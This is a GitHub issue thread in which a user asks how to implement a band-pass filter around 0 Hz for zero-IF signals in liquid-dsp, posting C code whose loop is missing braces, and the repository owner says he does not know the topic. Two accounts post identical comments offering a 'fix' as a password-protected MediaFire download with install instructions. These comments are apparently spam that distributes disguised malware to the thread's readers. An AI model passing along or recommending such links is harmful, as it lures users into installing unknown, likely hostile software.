### ISSUE TITLE
Zero IF band pass filter

### ISSUE THREAD

**Issue by Mas313** [Cuda-Chen/liquid-dsp-practice#2]
Hi,
I want to receive multiple narrow band transmissions using liquiddsp simultaneously, so inhave implemented 4 receivers in parallel that after downconversion using nco need to perform band pass filtering. It means that zero IF signal should allow certain band to pass. In my case I want to have band pass filter from -25khz to 25khz cerer3d around 0 hz. 
how can I implement bandpass filter in liquiddsp for this. I have tried following but no luck. 
```
#define SAMPLERATE 1024000.0f
#define CUTOFF_HZ 50000.0f
#define NUM_SAMPLES 1024

float fc = CUTOFF_HZ/SAMPLERATE; // cutoff frequency
unsigned int h_len = 64; // filter length    
float As = 70.0f; // stop-band attenuation

float complex r[NUM_SAMPLES]; // zero if  signal nco output
float complex rf[NUM_SAMPLES]; // filtered signal

// design filter from prototype and scale to bandwidth
firfilt_crcf q = firfilt_crcf_create_kaiser(h_len, fc, As, 0.0f);
firfilt_crcf_set_scale(q, 2.0f*fc);

while (1) {
    ReadzeroIFsamples(r, NUM_SAMPLES); //
    for (int i=0; i<NUM_SAMPLES; i++)
        firfilt_crcf_push(q, r[i]);
        firfilt_crcf_execute(q, &rf[i]);
    }
```
Thanks for your time.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Cuda-Chen** [comment]
Hi @Mas313 ,
I have to admit I am not familiar with the topic you are asking for.
I think you can ask the liquid-dsp community instead.
